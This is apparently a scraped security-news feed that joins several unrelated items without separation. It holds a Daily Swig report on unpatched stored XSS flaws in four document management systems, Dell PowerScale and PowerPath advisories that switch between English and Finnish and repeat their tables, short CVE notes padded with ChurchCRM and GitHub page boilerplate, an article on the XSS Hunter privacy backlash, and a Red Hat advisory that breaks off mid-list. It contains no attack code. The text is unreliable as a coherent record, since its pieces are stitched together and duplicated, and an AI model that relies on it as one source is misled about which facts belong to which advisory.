No response or patch yet forthcoming from providers of vulnerable document management systems

No response or patch yet forthcoming from providers of vulnerable document management systems

Researchers have disclosed a raft of serious document management system (DMS) vulnerabilities impacting four enterprise vendors who have not yet resolved the issues.

In a blog post published on Tuesday (February 7), Tod Beardsley, director of research at Rapid7, said the cross-site scripting (XSS) flaws affected vendors ONLYOFFICE, OpenKM, LogicalDOC, and Mayan.

All software examined by Rapid7 are on-prem, cloud, open source, or freemium DMS solutions.

Read more of the latest security vulnerability news

“Given the high severity of a stored XSS vulnerability in a document management system, especially one that is often part of automated workflows, administrators are urged to apply any vendor-supplied updates on an emergency basis,” the researchers advise.

No such updates have emerged at the time of writing, however.

**Bug breakdown**

The most severe issue belongs to ONLYOFFICE’s Workspace enterprise app platform. Tracked as CVE-2022-47412 and believed to impact versions from 0 through 12.1.0.1760, the stored cross-site scripting (XSS) vulnerability could be exploited if an attacker can ensure a malicious document is saved in the DMS for indexing.

When a victim has unwittingly saved the document and triggered the XSS condition, an attacker could steal session cookies to create new, privileged accounts or perform a browser session hook and secure access to stored documents.

Another two vulnerabilities, CVE-2022-47413 and CVE-2022-47414, impact OpenKM’s open source DMS version 6.3.12. CVE-2022-47413 is another stored XSS bug that requires a victim to save a malicious document in the DMS. The other vulnerability requires an attacker to have authenticated access to the OpenKM console. If they meet this condition, a stored XSS security flaw can be reached in the document ‘note’ function.

Four less severe vulnerabilities were discovered in LogicalDOC’s open source DMS. However, CVE-2022-47416, a stored XSS in an in-app chat system, is the only one that only impacts the Enterprise version of the DMS.

However, CVE-2022-47415, CVE-2022-47417, and CVE-2022-47418 all impact LogicalDOC Community Edition and Enterprise, versions 8.7.3 and 8.8.2, respectively.

These vulnerabilities were found in the in-app messaging system, stored document file name indexes, and stored document version comments. All required some form of authentication or access, although Rapid7 says that guest privilege alone is often enough to target administrators.

The final, least severe unpatched vulnerability is CVE-2022-47419, a tag-based XSS found in Mayan’s open source DMS, EDMS Workspace, version 4.3.3.

**No response**

In all instances, Rapid7 attempted to contact the vendors via email addresses, support channels, and support tickets.

“Unfortunately, none of these vendors were able to respond to Rapid7's disclosure outreach, despite having coordinated these disclosures with CERT/CC,” the company said. “As such, these issues are being disclosed in accordance with Rapid7's vulnerability disclosure policy.”

Rapid7 told The Daily Swig that none of the organizations have been in contact since the disclosure.

Rapid7 researcher Matthew Kienow discovered the flaws.

The Daily Swig has reached out to each vendor for comment. We will update this story if and when we hear back.

YOU MAY ALSO LIKE DOM XSS vulnerability in Gartner Peer Insights widget patched

Radio silence from DMS vendor quartet over XSS zero-days

Dell PowerScale OneFS, versions 8.2.x-9.3.x, contain a heap-based buffer overflow. A local privileged malicious user could potentially exploit this vulnerability, leading to system takeover. This impacts compliance mode clusters.

**Vaikutus**

High

**Tiedot**

**Proprietary Code CVEs**

**Description**

**CVSS Base Score**

**CVSS Vector String**

CVE-2022-23089

Dell PowerScale OneFS versions 9.0.0.x, 9.1.0.x, 9.2.0.x, 9.2.1.x, 9.3.0.x, and 9.4.0.x contain an Out-of-Bounds Read vulnerability. An attacker with ISI\_PRIV\_LOGIN\_SSH or ISI\_PRIV\_LOGIN\_CONSOLE may potentially exploit this vulnerability leading to a Denial of Service situation.

5.5

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

CVE-2022-23091

Dell PowerScale OneFS, versions 9.1.0.x through 9.4.0.x contains a use after free vulnerability. A low privilege local attacker may potentially exploit this vulnerability, leading to information disclosure, system takeover, or complete outage.

6.7

CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H

CVE-2022-33934

Dell PowerScale OneFS, versions 8.2.x through 9.4.x contain multiple stored cross-site scripting vulnerabilities. A remote authenticated malicious user with high privileges may potentially exploit these vulnerabilities to store malicious HTML or JavaScript code through multiple affected fields.

7.7

CVSS:3.1/AV:L/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:H

CVE-2022-34438

Dell PowerScale OneFS, versions 8.2.x through 9.4.0.x, contain a privilege context switching error. A local authenticated malicious user with high privilegesmay potentially exploit this vulnerability, leading to full system compromise. This issue impacts compliance mode clusters.

6.7

CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

CVE-2022-34439

Dell PowerScale OneFS, versions 8.2.0.x through 9.4.0.x contain allocation of Resources Without Limits or Throttling vulnerability. A malicious unauthenticated network user may potentially exploit this vulnerability, leading to denial of service and performance issue on that node.

5.3

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

CVE-2022-34444

Dell PowerScale OneFS, versions 9.2.0.x through 9.4.0.x contain an information vulnerability. A remote unauthenticated attacker may potentially exploit this vulnerability to cause data leak.

5.9

CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N

CVE-2022-34445

Dell PowerScale OneFS, versions 8.2.x through 9.3.x contain a weak encoding for a password. A malicious local privileged attacker may potentially exploit this vulnerability, leading to information disclosure.

6.0

CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N

CVE-2022-34454

Dell PowerScale OneFS, versions 8.2.x-9.3.x contain a heap-based buffer overflow. A local privileged malicious user may potentially exploit this vulnerability, leading to system takeover. This issue impacts compliance mode clusters.

6.7

CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

**Note:** CVE-2022-34454 and CVE-2022-34438 scores 6.7 Medium, however in compliance mode cluster it is 6.7 (Business Critical) as it may affect compliance restrictions.

**Third-party Component**

**CVEs**

**CVSS Vector String**

Cyrus SASL

CVE-2022-24407

See NVD for individual scores for each CVE.

CVE-2019-19906

CVE-2013-4122

**Proprietary Code CVEs**

**Description**

**CVSS Base Score**

**CVSS Vector String**

CVE-2022-23089

Dell PowerScale OneFS versions 9.0.0.x, 9.1.0.x, 9.2.0.x, 9.2.1.x, 9.3.0.x, and 9.4.0.x contain an Out-of-Bounds Read vulnerability. An attacker with ISI\_PRIV\_LOGIN\_SSH or ISI\_PRIV\_LOGIN\_CONSOLE may potentially exploit this vulnerability leading to a Denial of Service situation.

5.5

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

CVE-2022-23091

Dell PowerScale OneFS, versions 9.1.0.x through 9.4.0.x contains a use after free vulnerability. A low privilege local attacker may potentially exploit this vulnerability, leading to information disclosure, system takeover, or complete outage.

6.7

CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H

CVE-2022-33934

Dell PowerScale OneFS, versions 8.2.x through 9.4.x contain multiple stored cross-site scripting vulnerabilities. A remote authenticated malicious user with high privileges may potentially exploit these vulnerabilities to store malicious HTML or JavaScript code through multiple affected fields.

7.7

CVSS:3.1/AV:L/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:H

CVE-2022-34438

Dell PowerScale OneFS, versions 8.2.x through 9.4.0.x, contain a privilege context switching error. A local authenticated malicious user with high privilegesmay potentially exploit this vulnerability, leading to full system compromise. This issue impacts compliance mode clusters.

6.7

CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

CVE-2022-34439

Dell PowerScale OneFS, versions 8.2.0.x through 9.4.0.x contain allocation of Resources Without Limits or Throttling vulnerability. A malicious unauthenticated network user may potentially exploit this vulnerability, leading to denial of service and performance issue on that node.

5.3

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

CVE-2022-34444

Dell PowerScale OneFS, versions 9.2.0.x through 9.4.0.x contain an information vulnerability. A remote unauthenticated attacker may potentially exploit this vulnerability to cause data leak.

5.9

CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N

CVE-2022-34445

Dell PowerScale OneFS, versions 8.2.x through 9.3.x contain a weak encoding for a password. A malicious local privileged attacker may potentially exploit this vulnerability, leading to information disclosure.

6.0

CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N

CVE-2022-34454

Dell PowerScale OneFS, versions 8.2.x-9.3.x contain a heap-based buffer overflow. A local privileged malicious user may potentially exploit this vulnerability, leading to system takeover. This issue impacts compliance mode clusters.

6.7

CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

**Note:** CVE-2022-34454 and CVE-2022-34438 scores 6.7 Medium, however in compliance mode cluster it is 6.7 (Business Critical) as it may affect compliance restrictions.

**Third-party Component**

**CVEs**

**CVSS Vector String**

Cyrus SASL

CVE-2022-24407

See NVD for individual scores for each CVE.

CVE-2019-19906

CVE-2013-4122

Dell Technologies suosittelee, että kaikki asiakkaat ottavat huomioon sekä CVSS-peruspistemäärän että kaikki asiaankuuluvat väliaikaiset ja ympäristöön liittyvät pisteet, jotka voivat vaikuttaa tietyn tietoturvahaavoittuvuuden mahdolliseen vakavuuteen.

**Tuotteet, joihin asia vaikuttaa ja tilanteen korjaaminen**

**CVEs Addressed**

**Product**

**Affected Versions**

**Updated Versions**

**Link to Update**

CVE-2022-23089

PowerScale OneFS

9.1.0.0 through 9.1.0.23  
9.2.1.0 through 9.2.1.16  
9.4.0.0 through 9.4.0.6

Download and install the latest RUP.  
\> = 9.1.0.24  
\> = 9.2.1.17  
\> = 9.4.0.7

PowerScale OneFS Downloads Area

9.3.0.0 through 9.3.0.9

RUP is expected in January 2023. If a fix is needed sooner, upgrade your version of OneFS to  = 9.4.0.7.

Any other version

Upgrade your version of PowerScale OneFS.

CVE-2022-23091

PowerScale OneFS

9.1.0.0 through 9.1.0.23  
9.2.1.0 through 9.2.1.16  
9.4.0.0 through 9.4.0.6

Download and install the latest RUP.  
\> = 9.1.0.24  
\> = 9.2.1.17  
\> = 9.4.0.7

9.3.0.0 through 9.3.0.9

RUP is expected in January 2023. If a fix is needed sooner, upgrade your version of OneFS to > = 9.4.0.7.

Any other version

Upgrade your version of PowerScale OneFS.

CVE-2022-24407  
CVE-2019-19906  
CVE-2013-4122

PowerScale OneFS

9.3.0.0 through 9.3.0.7

Download and install the latest RUP.  
\> = 9.3.0.9

Any other Version

See DSA-2022-245: Dell PowerScale OneFS Security Update for Multiple Security Updates

CVE-2022-33934

PowerScale OneFS

9.1.0.0 through 9.1.0.23  
9.2.1.0 through 9.2.1.16  
9.3.0.0 through 9.3.0.7  
9.4.0.0 through 9.4.0.4

Download and install the latest RUP.  
\> = 9.1.0.24  
\> = 9.2.1.17  
\> = 9.3.0.9  
\> = 9.4.0.5

Any other version

Upgrade your version of PowerScale OneFS.

CVE-2022-34438

PowerScale OneFS

9.3.0.0 through 9.3.0.7

Download and install the latest RUP.  
\> = 9.3.0.9

Any other version

See DSA: DSA-2022-245

CVE-2022-34439

PowerScale OneFS

9.3.0.0 through 9.3.0.7

Download and install the latest RUP.  
\> = 9.3.0.9

Any other version

See DSA-2022-245: Dell PowerScale OneFS Security Update for Multiple Security Updates

CVE-2022-34444

PowerScale OneFS

9.2.1.0 through 9.2.1.16  
9.3.0.0 through 9.3.0.7  
9.4.0.0 through 9.4.0.5

Download and install the latest RUP.  
\> = 9.2.1.17  
\> = 9.3.0.9  
\> = 9.4.0.6

Any other version

Upgrade your version of PowerScale OneFS.

CVE-2022-34445

PowerScale OneFS

9.1.0.0 through 9.1.0.20  
9.2.1.0 through 9.2.1.13  
9.3.0.0 through 9.3.0.7  
9.4.0.0 through 9.4.0.4

Download and install the latest RUP.  
\> = 9.1.0.21  
\> = 9.2.1.14  
\> = 9.3.0.9  
\> = 9.4.0.5

Any other version

Upgrade your version of PowerScale OneFS.

CVE-2022-34454

PowerScale OneFS

9.1.0.0 through 9.1.0.20  
9.2.1.0 through 9.2.1.13  
9.3.0.0 through 9.3.0.7

Download and install the latest RUP.  
\> = 9.1.0.21  
\> = 9.2.1.14  
\> = 9.3.0.9

Any other version

Upgrade your version of PowerScale OneFS.

**CVEs Addressed**

**Product**

**Affected Versions**

**Updated Versions**

**Link to Update**

CVE-2022-23089

PowerScale OneFS

9.1.0.0 through 9.1.0.23  
9.2.1.0 through 9.2.1.16  
9.4.0.0 through 9.4.0.6

Download and install the latest RUP.  
\> = 9.1.0.24  
\> = 9.2.1.17  
\> = 9.4.0.7

PowerScale OneFS Downloads Area

9.3.0.0 through 9.3.0.9

RUP is expected in January 2023. If a fix is needed sooner, upgrade your version of OneFS to  = 9.4.0.7.

Any other version

Upgrade your version of PowerScale OneFS.

CVE-2022-23091

PowerScale OneFS

9.1.0.0 through 9.1.0.23  
9.2.1.0 through 9.2.1.16  
9.4.0.0 through 9.4.0.6

Download and install the latest RUP.  
\> = 9.1.0.24  
\> = 9.2.1.17  
\> = 9.4.0.7

9.3.0.0 through 9.3.0.9

RUP is expected in January 2023. If a fix is needed sooner, upgrade your version of OneFS to > = 9.4.0.7.

Any other version

Upgrade your version of PowerScale OneFS.

CVE-2022-24407  
CVE-2019-19906  
CVE-2013-4122

PowerScale OneFS

9.3.0.0 through 9.3.0.7

Download and install the latest RUP.  
\> = 9.3.0.9

Any other Version

See DSA-2022-245: Dell PowerScale OneFS Security Update for Multiple Security Updates

CVE-2022-33934

PowerScale OneFS

9.1.0.0 through 9.1.0.23  
9.2.1.0 through 9.2.1.16  
9.3.0.0 through 9.3.0.7  
9.4.0.0 through 9.4.0.4

Download and install the latest RUP.  
\> = 9.1.0.24  
\> = 9.2.1.17  
\> = 9.3.0.9  
\> = 9.4.0.5

Any other version

Upgrade your version of PowerScale OneFS.

CVE-2022-34438

PowerScale OneFS

9.3.0.0 through 9.3.0.7

Download and install the latest RUP.  
\> = 9.3.0.9

Any other version

See DSA: DSA-2022-245

CVE-2022-34439

PowerScale OneFS

9.3.0.0 through 9.3.0.7

Download and install the latest RUP.  
\> = 9.3.0.9

Any other version

See DSA-2022-245: Dell PowerScale OneFS Security Update for Multiple Security Updates

CVE-2022-34444

PowerScale OneFS

9.2.1.0 through 9.2.1.16  
9.3.0.0 through 9.3.0.7  
9.4.0.0 through 9.4.0.5

Download and install the latest RUP.  
\> = 9.2.1.17  
\> = 9.3.0.9  
\> = 9.4.0.6

Any other version

Upgrade your version of PowerScale OneFS.

CVE-2022-34445

PowerScale OneFS

9.1.0.0 through 9.1.0.20  
9.2.1.0 through 9.2.1.13  
9.3.0.0 through 9.3.0.7  
9.4.0.0 through 9.4.0.4

Download and install the latest RUP.  
\> = 9.1.0.21  
\> = 9.2.1.14  
\> = 9.3.0.9  
\> = 9.4.0.5

Any other version

Upgrade your version of PowerScale OneFS.

CVE-2022-34454

PowerScale OneFS

9.1.0.0 through 9.1.0.20  
9.2.1.0 through 9.2.1.13  
9.3.0.0 through 9.3.0.7

Download and install the latest RUP.  
\> = 9.1.0.21  
\> = 9.2.1.14  
\> = 9.3.0.9

Any other version

Upgrade your version of PowerScale OneFS.

**Versiohistoria**

**Revision**

**Date**

**Description**

1.0

202211-21

Initial Release

**Asiaan liittyvät tiedot**

Dell Security Advisories and Notices  
Dell Vulnerability Response Policy  
CVSS Scoring Guide

21 marrask. 2022

CVE-2022-34454: DSA-2022-271: Dell PowerScale OneFS Security Updates for Multiple Security Vulnerabilities

PowerPath Management Appliance with versions 3.3, 3.2*, 3.1 & 3.0* contains sensitive information disclosure vulnerability. An Authenticated admin user can able to exploit the issue and view sensitive information stored in the logs.

**Vaikutus**

High

**Tiedot**

**Proprietary Code CVEs**

**Description**

**CVSS Base Score**

**CVSS Vector String**

CVE-2022-34446

PowerPath Management Appliance with versions 3.3 and 3.2\* contains Authorization Bypass vulnerability. An authenticated remote user with limited privileges (such as, of role Monitoring) may potentially exploit this issue and gain access to sensitive information and modify the configuration.

8.8

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

CVE-2022-34447

PowerPath Management Appliance with versions 3.3, 3.2\*, 3.1, and 3.0\* contains operating system Command Injection vulnerability. An authenticated remote attacker with administrative privileges may potentially exploit the issue and perform commands on the system as the root user.

7.2

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

CVE-2022-34448

PowerPath Management Appliance with versions 3.3, 3.2\*, 3.1, and 3.0\* contains a Cross-site Request Forgery vulnerability. An unauthenticated nonprivileged user may potentially exploit the issue and perform any privileged state-changing actions. 

8.8

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVE-2022-34449

PowerPath Management Appliance with versions 3.3 and 3.2\* contains a hard-coded Cryptographic Keys vulnerability. Authenticated admin users may potentially exploit the issue that leads to view and modifying sensitive information that is stored in the application.

6.0

CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N

CVE-2022-34450

PowerPath Management Appliance with version 3.3 contains Privilege Escalation vulnerability. An authenticated admin user may potentially exploit this issue and gain unrestricted control/code execution on the system as root.

6.7

CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

CVE-2022-34451

PowerPath Management Appliance with versions 3.3, 3.2\*, 3.1, and 3.0\* contains a Stored Cross-site Scripting Vulnerability. An authenticated admin user may potentially exploit this vulnerability to hijack user sessions or trick a victim application user into unknowingly send arbitrary requests to the server.

4.8  
 

CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N  
 

CVE-2022-34452

PowerPath Management Appliance with versions 3.3, 3.2\*, 3.1, and 3.0\* contains sensitive information disclosure vulnerability. An Authenticated admin user may potentially be able to exploit the issue and view sensitive information that is stored in the logs.

2.7

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N

  

**Proprietary Code CVEs**

**Description**

**CVSS Base Score**

**CVSS Vector String**

CVE-2022-34446

PowerPath Management Appliance with versions 3.3 and 3.2\* contains Authorization Bypass vulnerability. An authenticated remote user with limited privileges (such as, of role Monitoring) may potentially exploit this issue and gain access to sensitive information and modify the configuration.

8.8

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

CVE-2022-34447

PowerPath Management Appliance with versions 3.3, 3.2\*, 3.1, and 3.0\* contains operating system Command Injection vulnerability. An authenticated remote attacker with administrative privileges may potentially exploit the issue and perform commands on the system as the root user.

7.2

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

CVE-2022-34448

PowerPath Management Appliance with versions 3.3, 3.2\*, 3.1, and 3.0\* contains a Cross-site Request Forgery vulnerability. An unauthenticated nonprivileged user may potentially exploit the issue and perform any privileged state-changing actions. 

8.8

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVE-2022-34449

PowerPath Management Appliance with versions 3.3 and 3.2\* contains a hard-coded Cryptographic Keys vulnerability. Authenticated admin users may potentially exploit the issue that leads to view and modifying sensitive information that is stored in the application.

6.0

CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N

CVE-2022-34450

PowerPath Management Appliance with version 3.3 contains Privilege Escalation vulnerability. An authenticated admin user may potentially exploit this issue and gain unrestricted control/code execution on the system as root.

6.7

CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

CVE-2022-34451

PowerPath Management Appliance with versions 3.3, 3.2\*, 3.1, and 3.0\* contains a Stored Cross-site Scripting Vulnerability. An authenticated admin user may potentially exploit this vulnerability to hijack user sessions or trick a victim application user into unknowingly send arbitrary requests to the server.

4.8  
 

CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N  
 

CVE-2022-34452

PowerPath Management Appliance with versions 3.3, 3.2\*, 3.1, and 3.0\* contains sensitive information disclosure vulnerability. An Authenticated admin user may potentially be able to exploit the issue and view sensitive information that is stored in the logs.

2.7

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N

  

Dell Technologies suosittelee, että kaikki asiakkaat ottavat huomioon sekä CVSS-peruspistemäärän että kaikki asiaankuuluvat väliaikaiset ja ympäristöön liittyvät pisteet, jotka voivat vaikuttaa tietyn tietoturvahaavoittuvuuden mahdolliseen vakavuuteen.

**Tuotteet, joihin asia vaikuttaa ja tilanteen korjaaminen**

**CVEs Addressed** 

**Product**

**Affected Versions**

**Updated Versions**

**Link to Update**

CVE-2022-34447

PowerPath Management Appliance

3.3, 3.2\*, 3.1 & 3.0\*

3.4

https://www.dell.com/support/home/en-us/product-support/product/powerpath-management-appliance/drivers

CVE-2022-34448

CVE-2022-34451

CVE-2022-34452

CVE-2022-34446

PowerPath Management Appliance

3.3 & 3.2\*

3.4

https://www.dell.com/support/home/en-us/product-support/product/powerpath-management-appliance/drivers

CVE-2022-34449

CVE-2022-34450

PowerPath Management Appliance

   3.3

  3.4

https://www.dell.com/support/home/en-us/product-support/product/powerpath-management-appliance/drivers  
 

**CVEs Addressed** 

**Product**

**Affected Versions**

**Updated Versions**

**Link to Update**

CVE-2022-34447

PowerPath Management Appliance

3.3, 3.2\*, 3.1 & 3.0\*

3.4

https://www.dell.com/support/home/en-us/product-support/product/powerpath-management-appliance/drivers

CVE-2022-34448

CVE-2022-34451

CVE-2022-34452

CVE-2022-34446

PowerPath Management Appliance

3.3 & 3.2\*

3.4

https://www.dell.com/support/home/en-us/product-support/product/powerpath-management-appliance/drivers

CVE-2022-34449

CVE-2022-34450

PowerPath Management Appliance

   3.3

  3.4

https://www.dell.com/support/home/en-us/product-support/product/powerpath-management-appliance/drivers  
 

**Versiohistoria**

Revision

Date

Description

1.0

2022-11-15

Initial Release

**Asiaan liittyvät tiedot**

Dell Security Advisories and Notices  
Dell Vulnerability Response Policy  
CVSS Scoring Guide

15 marrask. 2022

CVE-2022-34452: DSA-2022-283: PowerPath Management Appliance Security Update for Multiple Security Vulnerabilities

Cross Site Scripting (XSS) vulnerability in Provide server 14.4 allows attackers to execute arbitrary code through the server-log via username field from the login form.

**CWE-79: Improper Neutralization of Input During Web Page Generation**

Unauthenticated stored XSS in server-log delivered via username field from login-form

**CWE-352: Cross-Site Request Forgery**

CSRF-token exposed in javascript, makes it possible to get a valid CSRF-Token and use it in XMLHTTPRequests. Using CSRF to add task, that runs commands on server as "NT-System"

**POC Video**

CVE-2023-23286: Provide server v.14.4

ChurchCRM 4.5.3 and below was discovered to contain a stored cross-site scripting (XSS) vulnerability at /api/public/register/family.

**Cloud Church CRM**

Church CRM is a modern Cloud-based CRM; You don’t have to pay for hardware, server and software maintenance.

**No additional cost**

If your church has an existing website, chances are good that you already have the prerequisites in place, and you can co-host the application on the same servers as your webpage.

**Multilingual**

Globalization and localization support is 25+ languages

**Mobile Friendly**

Accessible from anywhere using any modern browser! Desktop, Laptop, Tablet & Phone compatible - The choice is yours.

**Features**

Check The Features

**Get Started**

The application is based on the concepts of people who are members of families and are also members of common interest groups. After you have installed the ChurchCRM application and can login, you are ready to configure the application. The first thing to do is enter your church name, address, phone and email address into the Report Settings. ChurchCRM will display “My Church” in large, bold letters at the top of each page. During the configuration stage, give some consideration to how you will use ChurchCRM:

*   What are the groups that you will use?
*   What properties do you need to record for people, families and groups?
*   Do you need to use custom fields?
*   Who needs access to the administration features?
*   Who should be given access to the Financial records?
*   Who can add or change records?
*   First Run Configuration Items

**Get Involved**

We

contributors! A lot of people over the last 10 years have helped make ChurchCRM awesome!

**History:** ChurchCRM is a branch off of two former open-source projects. It started via the team behind a program called InfoCentral. 5 years later, ChurchInfo took over the code base.  
After examining the inner workings of these ChurchInfo, we have started working on ChurchCRM by adding new features and bringing it up to speed with modern application development techniques here on GitHub!

You don't need to be a developer to contribute to the software; we are always adding new features to the application that need to be localized. Join our POEditor.com project to help translate the software into your native language.

CVE-2023-24690: An OpenSource CRM System Built for Churches

Mojoportal v2.7.0.0 was discovered to contain a stored cross-site scripting (XSS) vulnerability in the Company Info Settings component. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the txtCompanyName parameter.

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?

CVE-2023-24687: GitHub - i7MEDIA/mojoportal: mojoPortal is an extensible, cross database, mobile friendly, web content management system (CMS) and web application framework written in C# ASP.NET.

Anonymized numbers of bug discoveries swiftly deleted after pushback

Adam Bannister 09 February 2023 at 17:12 UTC  
Updated: 09 February 2023 at 17:44 UTC

Anonymized numbers of bug discoveries swiftly deleted after pushback

The maintainers of a new version of popular hacking tool XSS Hunter have been criticized for inspecting potentially sensitive data generated by users after they shared anonymized statistics about the vulnerabilities unearthed.

The contentious communication from Truffle Security, which launched a new fork of the open source tool last week after its deprecation by original creator Matthew Bryant, was tweeted yesterday.

“Wow,>1000 XSS Reports since we launched our flavor of XSSHunter last week,” it said.

Read more of the latest hacking tools news and analysis

“∼20 of them have their .git directory exposed”, it continued, adding “∼15 of them have cloud credenitals exposed and >100 have CORS issues!”

This provoked consternation among bug hunters and security researchers on Twitter, including hacker and pen tester Julien Ahrens. “Sounds like someone is looking at your data closely...” he tweeted. “Protip: Host your own instance of xsshunter-express or ezxss to avoid leaking potentially sensitive data to this company.”

**‘Anonymized stats’**

Truffle Security responded to the social media storm by deleting the offending tweet and acknowledging the pushback: “We posted some anonymized stats about XSSHunter (similar to Hackerone’s public anonymized reports), and members of the community voiced privacy concerns, so we took it down. Thank you for reposting it, totally fair to hold us accountable.”

However, ‘@Th3MadHacker’ countered: “This is not the same as hackerone, Programs on hackerone give consent to share metrics.”

In response to queries from The Daily Swig, Truffle Security co-founder Dylan Ayrey echoed the comments posted from his company’s Twitter account and sought to assuage privacy concerns, adding: “No one’s raw reports were viewed by employees”.

Colin Winhall, meanwhile, urged bug bounty platforms to “provide in-house solutions for bXss and fork their own version of XSSHunter”.

YesWeHack, the Paris-based bug bounty platform, highlighted its own such solution for self-hosting out-of-band tools, PwnMachine.

Bug bounty programs often prohibit the use of hacking tools hosted by third party platforms, because of the risk of sensitive data leaks that could empower malicious hackers, as appears to now be the case with AWS.

**Privacy motives**

XSS Hunter was launched as a managed service last week after Bryant, aka ‘Mandatory’, announced he would no longer be maintaining the application.

The new version of the service, which is hosted on San Francisco-based Truffle Security’s domain, is an open source fork of the original code.

Bryant remains the maintainer of the xsshunter-express repository, through which users can self-host their own instance, and other forks are available to migrate to.

Privacy concerns were seemingly a motive in launching the new XSS Hunter service and development of new features, such as the blurring of screenshots captured by the platform.

Speaking to The Daily Swig previously about the relaunch, Truffle Security’s Ayrey said that “many users of XSS Hunter would accidentally send sensitive data to the platform”. He also expressed concern that post-deprecation, “another tool might have come along to replace it with operators that may have had different intentions \[to Mandatory\] with the data collected.

“We saw an opportunity to both address privacy concerns as well as give the cybersecurity community new capabilities,” Ayrey added.

Bryant told The Daily Swig that he had become “increasingly uncomfortable with the amount of vulnerability information stored in the service”, and said “Truffle Security is starting out with an eye on balancing privacy and bug bounty research interests”.

BACKGROUND Truffle Security relaunches XSS Hunter tool with new features

New XSS Hunter host Truffle Security faces privacy backlash

Red Hat Security Advisory 2023-0560-01 - Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments. Issues addressed include bypass, cross site request forgery, cross site scripting, denial of service, deserialization, and improper authorization vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Critical: OpenShift Container Platform 4.10.51 security update  
Advisory ID:       RHSA-2023:0560-01  
Product:           Red Hat OpenShift Enterprise  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:0560  
Issue date:        2023-02-08  
CVE Names:         CVE-2020-7692 CVE-2022-25857 CVE-2022-30946   
                   CVE-2022-30952 CVE-2022-30953 CVE-2022-30954   
                   CVE-2022-36882 CVE-2022-36883 CVE-2022-36884   
                   CVE-2022-36885 CVE-2022-43401 CVE-2022-43402   
                   CVE-2022-43403 CVE-2022-43404 CVE-2022-43405   
                   CVE-2022-43406 CVE-2022-43407 CVE-2022-43408   
                   CVE-2022-43409 CVE-2022-45047 CVE-2022-45379   
                   CVE-2022-45380 CVE-2022-45381   
=====================================================================

1. Summary:

Red Hat OpenShift Container Platform release 4.10.51 is now available with  
updates to packages and images that fix several bugs and add enhancements.

Red Hat Product Security has rated this update as having a security impact  
of Critical. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat OpenShift Container Platform 4.10 - aarch64, noarch, ppc64le, s390x, x86_64

3. Description:

Red Hat OpenShift Container Platform is Red Hat's cloud computing  
Kubernetes application platform solution designed for on-premise or private  
cloud deployments.

Security Fix(es):

* jenkins-plugin/script-security: Sandbox bypass vulnerabilities in Jenkins  
Script Security Plugin (CVE-2022-43401)  
* jenkins-plugin/workflow-cps: Sandbox bypass vulnerabilities in Pipeline:  
Groovy Plugin (CVE-2022-43402)  
* jenkins-plugin/script-security: Sandbox bypass vulnerabilities in Jenkins  
Script Security Plugin (CVE-2022-43403)  
* jenkins-plugin/script-security: Sandbox bypass vulnerabilities in Jenkins  
Script Security Plugin (CVE-2022-43404)  
* jenkins-plugin/pipeline-groovy-lib: Sandbox bypass vulnerability in  
Pipeline: Groovy Libraries Plugin (CVE-2022-43405)  
* jenkins-plugin/workflow-cps-global-lib: Sandbox bypass vulnerability in  
Pipeline: Deprecated Groovy Libraries Plugin (CVE-2022-43406)  
* google-oauth-client: missing PKCE support in accordance with the RFC for  
OAuth 2.0 for Native Apps can lead to improper authorization  
(CVE-2020-7692)  
* snakeyaml: Denial of Service due to missing nested depth limitation for  
collections (CVE-2022-25857)  
* jenkins-plugin/pipeline-input-step: CSRF protection for any URL can be  
bypassed in Pipeline: Input Step Plugin (CVE-2022-43407)  
* mina-sshd: Java unsafe deserialization vulnerability (CVE-2022-45047)  
